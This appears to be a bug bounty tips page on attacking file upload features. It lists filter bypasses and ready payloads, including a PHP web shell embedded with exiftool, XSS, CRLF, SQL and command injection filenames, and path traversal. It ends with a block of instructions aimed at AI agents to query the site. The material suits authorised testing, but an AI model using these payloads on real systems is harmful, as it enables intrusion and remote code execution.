# File Upload

* [#BugBountyProTip Some caching servers would cache files larger than 2mb. if app accepts file upload, then upload a large file and access it #multiple times while logged-in. It will be cached. Then access it without login, and pingo! unauthenticated access to sensitive files!](https://twitter.com/Zigoo0/status/1247175475316830208)
* [Uploader Vuln:\
  Content-Disposition: form-data; name="FactorImage"; filename="Untitled.jpg\test.aspx"\
  Content-Type: image/jpeg\
  Res:\
  {"StoreHousePicture\_File":"test.aspx","Success":true}#BugBounty](https://twitter.com/YShahinzadeh/status/1063403827590762497)
* <https://anotherhackerblog.com/exploiting-file-uploads-pt1/>
* <https://anotherhackerblog.com/exploiting-file-uploads-pt-2/>
* Payloads - <https://github.com/1N3/IntruderPayloads/tree/master/Uploads>
* [Bypassing most FILE Uploads filters for $$$$ \* .htaccess <- upload htaccess \* file.svg <- uploading svg = xss \* file.SVg <- must try case mismatch \* file.png.svg \* file.php%00.png \* file.png' or '1'='1 \* ../../file.png \* file.'svg <- invalid ext. #bugbountytips #](https://twitter.com/pwntheweb/status/1258628238655598592)[BugBounty](https://twitter.com/hashtag/BugBounty?src=hashtag_click)
* Bypass File Upload Filtering In image : exiftool -Comment='\<?php echo "\<pre>"; system($\_GET\['cmd']); ?>' shell.jpg mv shell.jpg shell.php.jpg [#bugbountytip](https://twitter.com/hashtag/bugbountytip?src=hashtag_click) [#bugbountytips](https://twitter.com/hashtag/bugbountytips?src=hashtag_click)
* [Time for another #BugBountyTip : While testing file upload forms on IIS7 servers, you can get RCE by uploading ".cer" files if ".asp" extension is blacklisted. This already let me to multiple RCEs in #bugbounty and #pentest projects. #bugbountytips RT if you love! More coming.](https://twitter.com/HusseiN98D/status/1194304002969743362)
* [#BugBounty If you find a file upload function for an image, try introducing an image with XSS in the filename like so: \<img src=x onerror=alert('XSS')>.png ">\<img src=x onerror=alert('XSS')>.png ">\<svg onmouseover=alert(1)>.svg <\<script>alert('xss')\<!--a-->a.png](https://twitter.com/h4x0r_dz/status/1292452802338476037)
* [Bypassing most FILE Uploads filters for $$$$ \* .htaccess <- upload htaccess \* file.svg <- uploading svg = xss \* file.SVg <- must try case mismatch \* file.png.svg \* file.php%00.png \* file.png' or '1'='1 \* ../../file.png \* file.'svg <- invalid ext. #bugbountytips #](https://twitter.com/0xsapra/status/1258628238655598592?s=20)[BugBounty](https://twitter.com/hashtag/BugBounty?src=hashtag_click)
* [#BugBounty If you find a file upload function for an image, try introducing an image with XSS in the filename like so: \<img src=x onerror=alert('XSS')>.png ">\<img src=x onerror=alert('XSS')>.png ">\<svg onmouseover=alert(1)>.svg <\<script>alert('xss')\<!--a-->a.png](https://twitter.com/h4x0r_dz/status/1292452802338476037?s=20)
* [Bypass File Upload Filtering In image : exiftool -Comment='\<?php echo "\<pre>"; system($\_GET\['cmd'\]); ?>' shell.jpg mv shell.jpg shell.php.jpg #bugbountytip #bugbountytips](https://twitter.com/shreyasrx/status/1257501243171373066?s=20)
* [#Bugbountytip Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter.](https://twitter.com/Hxzeroone/status/1250342399068352512?s=20)
* [bypassing file content restrictions: in some cases you can do a crlf injection via filename x.png%22%0d%0a%0d%0a%0d%0a\<script>alert(1)\</script> this will cause Content-Disposition to throw its content into the file #bugbounty #xss #crlfinjection #bugbountytip](https://twitter.com/k33r0k/status/1047700322322399233?s=20)
* [RT@CyberSecurityN8: RT@infosecsanyam: RT@th3cyb3rc0p: RT@M404ntf: If a web application allow you to upload a .zip file, zip:// is an interesting PHP wrapper to turn a LFI into a RCE. #BugBounty #BugBountyTips #InfoSec](https://twitter.com/infosecsanyam/status/1339481832451092480?s=20)

![](/files/-MTeC1rUild_UYMYAiWY)

[Chaining file uploads with other vulns:](https://twitter.com/ManasH4rsh/status/1315624930998775808?s=20)-

```
Chaining file uploads with other vulns:-

 Set filename to:- 

> ../../../tmp/lol.png for path traversals
> sleep(10)-- -.jpg for SQLi.
> <svg onload=alert(document.comain)>.jpg/png for xss
> ; sleep 10; for command injections
```

Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter.

![](/files/-MWEFgEN14t2enelKC7W)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gowsundar.gitbook.io/book-of-bugbounty-tips/file-upload.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.